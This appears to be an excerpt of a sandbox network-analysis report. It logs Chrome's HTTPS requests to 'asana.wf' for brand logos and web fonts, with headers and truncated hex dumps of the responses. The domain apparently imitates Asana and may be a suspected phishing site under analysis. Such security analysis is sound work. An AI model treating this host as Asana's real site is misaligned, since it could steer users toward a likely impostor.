                                                                                                                                                                                                                    Data Ascii: C^9\%l!Fb%PD7]11BjRl(XPxS_g:}%{x0BYiab[B$NzLNXWv/g~^M6s0F2)m$dG9-][eN7^\f${Rp5C"U@pthT+9ZS$/Mnx`fxMehf%
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC8000INData Raw: 3d 86 df 7e 21 30 3b 77 90 b0 c1 9e 1e 0e a0 12 ee 74 35 42 9e 0f 79 94 67 31 e4 31 a4 c6 55 99 82 c3 5d b4 cf db d7 21 8e a8 ef a2 2d ad fc 2a a6 4a a8 cc 22 4f 30 cb a2 00 54 bb 21 15 ef 79 8a 74 a1 cf 3c cf 0a 16 14 79 02 67 dc d6 44 f1 07 19 c6 74 a7 46 de 93 25 2c a7 22 f0 d3 0d 36 ad 1e 0a 55 0c 97 d7 60 e2 15 ff 59 fe 47 e4 59 f8 8e 79 16 bf 5f 1e 2a 29 07 37 08 94 4b fe 8d ce dd 45 d8 f1 66 5c 09 1f 57 e7 2e 7e cd 87 e2 8d 79 0a 95 c9 30 9c c7 5e a6 83 b8 7c 0b 23 26 bc 08 20 1b 53 d8 5b 01 84 91 87 01 57 15 ac be 81 6e 8b 6c 71 03 92 59 40 b1 de 12 73 71 98 75 99 b9 02 3a 53 65 e1 91 3c 22 2b f2 84 c8 ab cc a3 e1 46 79 aa 9b a5 14 cc f2 d8 04 1b a3 29 ea 3c d1 a8 53 f4 a3 5e 1e 53 dd cc 63 db 5c 18 27 cb 8e 5e 9e 02 17 7f 25 ea 1a 19 a6 63 6d 4f
                                                                                                                                                                                                                    Data Ascii: =~!0;wt5Byg11U]!-*J"O0T!yt<ygDtF%,"6U`YGYy_*)7KEf\W.~y0^|#& S[WnlqY@squ:Se<"+Fy)<S^Sc\'^%cmO


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    4192.168.2.164970394.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC597OUTGET /img/logo-ratio-40pxheight-Amazon.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC254INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:56 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "17c1-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 6081
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC6081INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 35 30 22 20 68 65 69 67 68 74 3d 22 34 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 35 30 20 34 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 38 38 2e 33 34 34 20 33 32 2e 34 32 39 32 43 38 31 2e 38 34 38 35 20 33 37 2e 32 33 32 38 20 37 32 2e 34 33 33 36 20 33 39 2e 37 39 35 36 20 36 34 2e 33 32 37 36 20 33 39 2e 37 39 35 36 43 35 32 2e 39 36 31 37 20 33 39 2e 37 39 35 36 20 34 32 2e 37 32 39 34 20 33 35 2e 35 37 37 39 20 33 34 2e 39 38 38 33 20 32 38 2e 35
                                                                                                                                                                                                                    Data Ascii: <svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M88.344 32.4292C81.8485 37.2328 72.4336 39.7956 64.3276 39.7956C52.9617 39.7956 42.7294 35.5779 34.9883 28.5


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    5192.168.2.164970694.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC599OUTGET /img/logo-ratio-40pxheight-McKesson.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC253INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:56 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "ce4-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 3300
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC3300INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 35 30 22 20 68 65 69 67 68 74 3d 22 34 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 35 30 20 34 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 33 37 2e 36 34 31 35 20 32 35 2e 36 39 37 38 48 32 37 2e 37 30 33 36 56 32 39 2e 30 37 32 36 48 33 37 2e 36 34 31 35 56 32 35 2e 36 39 37 38 5a 22 20 66 69 6c 6c 3d 22 62 6c 61 63 6b 22 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 31 34 35 20 31 30 2e 33 37 37 33 56 32 39 2e 30 37 37 33 48 31 33 39 2e 38 32 35 43 31 33 39 2e 38 32 35 20 32 39 2e 30 37 37 33 20 31 33 33 2e 35 35 32 20 31 37 2e 39 33 32 36 20 31 33 32 2e 38 34 36 20 31 36 2e 36
                                                                                                                                                                                                                    Data Ascii: <svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M37.6415 25.6978H27.7036V29.0726H37.6415V25.6978Z" fill="black"/><path d="M145 10.3773V29.0773H139.825C139.825 29.0773 133.552 17.9326 132.846 16.6


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    6192.168.2.164970794.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:56 UTC368OUTGET /img/logo-ratio-40pxheight-Amazon.svg HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC254INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "17c1-6164f3d154651"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 6081
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC6081INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 35 30 22 20 68 65 69 67 68 74 3d 22 34 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 35 30 20 34 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 38 38 2e 33 34 34 20 33 32 2e 34 32 39 32 43 38 31 2e 38 34 38 35 20 33 37 2e 32 33 32 38 20 37 32 2e 34 33 33 36 20 33 39 2e 37 39 35 36 20 36 34 2e 33 32 37 36 20 33 39 2e 37 39 35 36 43 35 32 2e 39 36 31 37 20 33 39 2e 37 39 35 36 20 34 32 2e 37 32 39 34 20 33 35 2e 35 37 37 39 20 33 34 2e 39 38 38 33 20 32 38 2e 35
                                                                                                                                                                                                                    Data Ascii: <svg width="150" height="40" viewBox="0 0 150 40" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M88.344 32.4292C81.8485 37.2328 72.4336 39.7956 64.3276 39.7956C52.9617 39.7956 42.7294 35.5779 34.9883 28.5


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    7192.168.2.164970894.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC556OUTGET /fonts/gordita/gordita-regular.woff HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    Origin: https://asana.wf
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "dde0-6164f3d14c951"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 56800
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: font/woff
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC7941INData Raw: 77 4f 46 46 00 01 00 00 00 00 dd e0 00 10 00 00 00 01 b2 38 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 6c 00 00 00 1c 00 00 00 1c 7c 8f c5 a1 47 44 45 46 00 00 01 88 00 00 00 3e 00 00 00 42 0a f3 0d 61 47 50 4f 53 00 00 01 c8 00 00 49 47 00 00 91 9e 1d b4 83 9a 47 53 55 42 00 00 4b 10 00 00 03 42 00 00 06 d8 ab c9 e0 ea 4f 53 2f 32 00 00 4e 54 00 00 00 53 00 00 00 60 69 fc d5 5c 63 6d 61 70 00 00 4e a8 00 00 03 ef 00 00 05 be 8f 2b 47 37 67 61 73 70 00 00 52 98 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 52 a0 00 00 73 17 00 00 e9 44 d7 35 57 51 68 65 61 64 00 00 c5 b8 00 00 00 36 00 00 00 36 0b fd 54 4e 68 68 65 61 00 00 c5 f0 00 00 00 21 00 00 00 24 08 cb 06 15 68 6d 74 78 00 00 c6 14 00 00 06
                                                                                                                                                                                                                    Data Ascii: wOFF8FFTMl|GDEF>BaGPOSIGGSUBKBOS/2NTS`i\cmapN+G7gaspRglyfRsD5WQhead66TNhhea!$hmtx
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 52 4f 93 05 02 64 81 00 59 20 40 16 a8 27 72 ad 64 01 2f 11 9a 05 e3 07 61 fc 20 8c 1f 84 f1 83 44 ac 95 88 b5 12 b1 56 22 d6 4a c4 5a 89 58 2b 11 6b 25 62 ad 44 ac 95 88 b5 12 b1 56 22 d6 4a c4 16 13 b1 59 b0 7e 15 ac 5f 65 b2 7e 15 ac 5f 05 eb 57 b1 17 1f 45 fd b5 14 84 af 67 75 73 90 79 cc 3c 02 99 46 8e ba 82 73 23 a9 98 7d 54 cc 3e ea bf 5a ea bf 3a 7a 9f a6 f7 69 6a bf 5a 6a 3f f9 b4 bf 96 fa af 8e ab 4f 73 f5 69 6a bf 5a 6a bf 3a 6a bf 3a 6a bf 3a 46 3b cd 8e 7c a4 f1 3e 73 e5 93 43 de a7 0e 6c 11 d3 a9 b7 67 1a 07 60 91 10 2c 12 82 45 42 b0 48 08 16 38 00 0b 1c 80 05 0e c0 02 07 60 81 03 b0 c0 01 18 20 04 03 84 60 80 10 0c 10 82 01 42 30 40 08 06 08 11 9d 07 88 cc 03 44 e5 01 22 32 44 34 86 88 c4 10 51 18 22 d2 42 44 59 88 08 0b 11 5d 21 4d de fb
                                                                                                                                                                                                                    Data Ascii: ROdY @'rd/a DV"JZX+k%bDV"JY~_e~_WEgusy<Fs#}T>Z:zijZj?OsijZj:j:j:F;|>sClg`,EBH8` `B0@D"2D4Q"BDY]!M
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: a1 a3 7c 8e 6c 43 47 1b 3a da d0 d1 86 8e 36 74 b4 a1 a3 0d 1d e5 33 5d f9 3c 57 3e cb 95 cf 6b e5 b3 5a f9 9c 56 3e a3 b5 a1 a3 7c 16 2b 9f c3 da d0 b1 0e 1d eb d0 b1 0e 1d eb d0 d1 86 8e f2 79 a8 0d 1d e5 f3 cf 3a 74 b4 a1 a3 0d 1d 6d e8 e8 44 47 1b 3a ca e7 83 f2 d9 a0 7c 2e e8 44 47 f9 ec af 0e 1d 6d e8 68 43 47 1b 3a da d0 f1 b4 d2 42 7e 1b ae 00 2d 0a d0 a2 00 2d 0a 4c 2d 0a d0 a2 00 2d 0a d0 a2 00 2d 0a d0 a2 00 2d 0a d0 a2 00 2d 0a d0 a2 00 2d 0a d0 a2 00 2d 0a d0 a2 00 2d 0a d0 a2 00 2d 0a d0 a2 e0 22 5a 14 a0 45 01 5a 14 a0 45 81 a9 45 01 5a 14 a0 45 81 a9 45 01 5a 14 a0 45 01 5a 14 98 5a 14 98 5a 14 a0 45 01 5a 14 a0 45 81 fa 76 90 ac 50 3d 78 ca 83 97 3c 78 c8 83 87 3c 62 0c d5 47 48 61 f6 4f b4 cf 22 ab 90 e7 90 d5 c8 f3 c8 0b 54 fa e0 99 6a
                                                                                                                                                                                                                    Data Ascii: |lCG:6t3]<W>kZV>|+y:tmDG:|.DGmhCG:B~--L---------"ZEZEEZEEZEZZZEZEvP=x<x<bGHaO"Tj
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: d0 f2 d0 90 f8 0b 1a 9c 3d 5c 0f e0 bb b5 f0 fd fa e5 20 0e c4 10 22 3f 62 9d c3 1c b4 f6 a0 97 e7 30 47 e8 9a f0 f8 5f d0 7d 42 97 37 7d 19 30 07 eb 5b 60 72 7d 17 78 95 bc 76 c8 da 8d 5e 59 4a 68 08 ef 55 0d da 2b 5f 74 73 61 0d c1 b6 39 12 3b 67 c8 66 6b 2e 9f 3a f1 21 fe 68 ba 7f db d6 b3 f8 03 8c 9e be f2 c9 49 f4 f1 db ed 17 ce 6f 45 1f 1c 3d 6e 23 f2 03 d6 df 30 89 50 06 6e 3b 64 4f 59 80 e7 f6 5d 07 76 1e 3f 35 bf a7 7d 21 c8 84 08 9e 1d f3 16 ec 04 7b e1 ef e7 94 96 77 10 78 fe c9 62 d9 27 00 eb 6f 1e 02 f6 83 c4 1c 05 20 7c 0a 49 c1 1c df 62 15 3d 0b 46 4f 7e f0 e1 a9 93 1f 76 cd b3 16 9e db d6 6b ba 55 77 a0 12 c3 27 6b af 27 e0 9d 3c b8 b8 09 74 6d bf 90 bb b9 60 e7 ac 11 3b 9c a7 09 8e e5 48 ce 61 55 36 48 25 32 2c ae e0 b3 c3 54 7e 7a 97 05
                                                                                                                                                                                                                    Data Ascii: =\ "?b0G_}B7}0[`r}xv^YJhU+_tsa9;gfk.:!hIoE=n#0Pn;dOY]v?5}!{wxb'o |Ib=FO~vkUw'k'<tm`;HaU6H%2,T~z
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 03 b7 8e a0 e6 bc 8a 99 53 02 75 46 3d eb b8 1e 9a 64 33 c3 1c 90 af 2b 67 f2 d1 f4 79 25 4e 2b e2 68 88 9c 5f 99 fd f4 02 01 1d 31 b2 51 d3 d6 86 59 6c db b8 48 48 4d f4 e4 c2 0b 76 82 72 b5 47 f1 1c 68 d2 5d b9 85 e3 41 8f 4d 66 03 1b 86 06 b7 5b 42 f9 6e 0a b9 5b e3 05 7e 29 01 8f 2f 00 68 67 ec 53 23 56 0c ae f0 7e d4 8d 31 0f 6c 3f f9 f1 db f7 9f b8 08 e7 82 2a cf bb 07 76 9d be 7f 4b 61 77 61 ac 37 bd 57 61 4a f7 96 2b a7 ef bb fc f2 ed 91 86 fe 1b ce 8f 6e be 10 5f 98 3b 8d ac 95 e4 18 91 b5 52 df 84 cd 27 70 5d d9 46 f3 39 08 3e 9e 24 eb 88 33 08 bc 37 59 f2 11 b7 7e 22 2b a7 38 4b ca b2 49 52 97 15 e0 b9 62 24 c3 32 ba 94 64 9d 38 9f e9 b8 48 13 99 ef 3f bd 8b 26 32 1f be 78 e2 fe b7 3f 3e b9 fd 81 18 bb 18 0d cf bb 49 69 ee b6 e1 22 14 c1 40 2a
                                                                                                                                                                                                                    Data Ascii: SuF=d3+gy%N+h_1QYlHHMvrGh]AMf[Bn[~)/hgS#V~1l?*vKawa7WaJ+n_;R'p]F9>$37Y~"+8KIRb$2d8H?&2x?>Ii"@*
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: 05 2f 17 d1 e3 ac 5a 76 e0 f6 65 0b 6f f1 5d 6e 32 ad f0 dd b7 a0 a1 b7 ef 78 ef 42 26 ea f0 c8 f2 23 a3 0b bf 60 42 3e 43 da 54 c4 48 73 cb 9a b5 cd 4d b8 de 2d b6 ea 7d 47 ee 52 b4 55 3a 22 13 e5 91 a2 fa 88 54 39 99 48 fb 5c 81 7e 7e f7 3f 4d 37 ef ea fc 50 ab 2f 2d be fd 75 ff 86 a2 b2 79 d6 cf 9f 79 06 5c ca c8 4a c9 7f e5 ff 6c ad 71 cc 2f fe c5 24 b3 a9 44 57 14 d8 b8 a5 13 d5 7e 61 92 fb 3b b2 34 81 29 11 79 26 63 75 45 07 2d 01 53 b2 6a f6 a2 9c 8e 65 01 65 be cd 95 a0 ad 76 d6 bc 6a f8 67 5a 09 e6 62 ff f0 6c 5b fe ec 05 e2 5b f2 e6 23 0f b0 c1 1b dc b6 41 df ff 81 09 84 d2 fa b5 98 3f 57 d0 73 8b f0 55 88 f6 34 9c e8 8b ce 55 2c 71 5c 2d 69 5a cc 14 ca 37 f7 2c 3f 78 78 78 d6 a8 b4 c2 7f 96 be 66 e1 94 ab 56 ef be fa 8d 9a a3 15 7d 98 60 e6 57
                                                                                                                                                                                                                    Data Ascii: /Zveo]n2xB&#`B>CTHsM-}GRU:"T9H\~~?M7P/-uyy\Jlq/$DW~a;4)y&cuE-SjeevjgZbl[[#A?WsU4U,q\-iZ7,?xxxfV}`W
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC8000INData Raw: c9 36 b2 73 ca 0d 78 cd df 2e f1 4c 6d 1f 40 63 b0 f8 15 99 c1 00 5f 37 3a 4d 15 8f 2c f4 e6 cb f3 0c ad 83 61 f7 b4 e5 b8 07 17 74 16 b4 b0 66 41 19 65 b6 35 0f 3f 29 b7 25 0e ce 52 e5 0e 38 3d 0b f0 f9 0a 9d a9 a6 ca 60 2a 23 fb 80 7a f4 5b 71 2f 59 4b 12 c9 28 b4 52 09 0f d8 f2 91 38 61 51 09 8a 9d 44 69 4e 16 40 35 3b 68 12 8a b3 b2 4c 3b 76 b8 87 86 ba e8 92 73 6b fa 4f 86 b7 35 b8 3c 2d eb 17 3e b8 85 22 ca ff f8 c7 14 51 1e e6 b7 0f cc e9 68 19 5e 88 be 22 4b 8f 3d 68 25 c2 99 4b 9f 5a bb 94 d3 e2 d5 6b 0e e3 cd e3 c0 e6 ab 57 75 74 ad 62 08 3b 40 ed 7e d0 93 84 77 cd 78 ae 27 5d 0e 85 4f 68 5e 96 99 30 36 6e 35 ec 6e 48 4d 4f 18 e3 61 fc 8a c8 bf 11 f9 e3 2a a2 6c 42 8f ef 97 09 24 14 02 69 08 3a 0f 24 07 88 80 dd 73 dd 03 85 81 4b da 20 0a be 2f
                                                                                                                                                                                                                    Data Ascii: 6sx.Lm@c_7:M,atfAe5?)%R8=`*#z[q/YK(R8aQDiN@5;hL;vskO5<->"Qh^"K=h%KZkWutb;@~wx']Oh^06n5nHMOa*lB$i:$sK /
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC859INData Raw: b5 44 d7 12 5d 4b 74 2d d1 b5 44 d7 12 5d 4b 74 2d d1 b5 44 cf 12 bd b0 f4 37 2c ba 61 89 1b 96 b8 61 89 1b 96 b8 61 89 1b 96 b8 11 c9 33 22 79 46 e4 7d 64 d5 7b d1 95 7b 86 29 f7 0c 53 ee 19 a6 9c 8b 66 54 f4 62 92 4f 4c f2 89 49 7d 39 27 4d 39 27 4d 39 27 4d 39 27 4d 39 27 4d 39 27 4d 39 27 4d 39 27 4d 39 27 cd b8 e4 13 97 7c e2 32 1e 71 89 6f 4b 3c 5b e2 d9 12 cf 96 78 b6 c4 b3 25 9e 9c a0 a6 9c a0 a6 2d fd b7 a5 ff b6 e8 d9 a2 67 8b 9e 2d 7a 09 e9 4f 42 fa 93 10 fd 84 e8 cb 89 6c 26 44 3f 21 7a 09 a5 67 ab 75 ab d9 6a df 56 a8 29 1a e2 1b e2 87 c4 0f 69 be 01 ef a8 f5 8d 29 0c a8 2f d9 98 87 c0 40 2a e3 16 dc 62 a6 18 18 5b 65 a9 76 61 69 1f 96 78 d1 98 30 ee 5b a4 02 8d 7b a8 96 ea c1 60 50 a8 09 75 a1 21 34 85 96 30 24 6c 13 b6 0b c3 c2 88 a2 26 71
                                                                                                                                                                                                                    Data Ascii: D]Kt-D]Kt-D7,aaa3"yF}d{{)SfTbOLI}9'M9'M9'M9'M9'M9'M9'M9'M9'|2qoK<[x%-g-zOBl&D?!zgujV)i)/@*b[evaix0[{`Pu!40$l&q


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    8192.168.2.164971094.131.101.654432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC555OUTGET /fonts/gordita/gordita-medium.woff HTTP/1.1
                                                                                                                                                                                                                    Host: asana.wf
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    Origin: https://asana.wf
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: font
                                                                                                                                                                                                                    Referer: https://asana.wf/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:57 GMT
                                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                                    Last-Modified: Wed, 17 Apr 2024 18:44:03 GMT
                                                                                                                                                                                                                    ETag: "da94-6164f3d14c951"
                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                    Content-Length: 55956
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Type: font/woff
                                                                                                                                                                                                                    2024-04-25 19:54:57 UTC7941INData Raw: 77 4f 46 46 00 01 00 00 00 00 da 94 00 10 00 00 00 01 b1 0c 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 46 54 4d 00 00 01 6c 00 00 00 1c 00 00 00 1c 7c 8f c5 a2 47 44 45 46 00 00 01 88 00 00 00 3e 00 00 00 42 0a f5 0d 63 47 50 4f 53 00 00 01 c8 00 00 48 9f 00 00 93 5a 3d c7 27 22 47 53 55 42 00 00 4a 68 00 00 03 47 00 00 06 d8 ab ba e0 e5 4f 53 2f 32 00 00 4d b0 00 00 00 53 00 00 00 60 6a 60 d5 6a 63 6d 61 70 00 00 4e 04 00 00 03 f2 00 00 05 c6 c8 13 07 16 67 61 73 70 00 00 51 f8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 52 00 00 00 70 74 00 00 e6 58 14 05 8b 6f 68 65 61 64 00 00 c2 74 00 00 00 36 00 00 00 36 0c 31 54 23 68 68 65 61 00 00 c2 ac 00 00 00 21 00 00 00 24 08 ff 06 c2 68 6d 74 78 00 00 c2 d0 00 00 06
                                                                                                                                                                                                                    Data Ascii: wOFFFFTMl|GDEF>BcGPOSHZ='"GSUBJhGOS/2MS`j`jcmapNgaspQglyfRptXoheadt661T#hhea!$hmtx
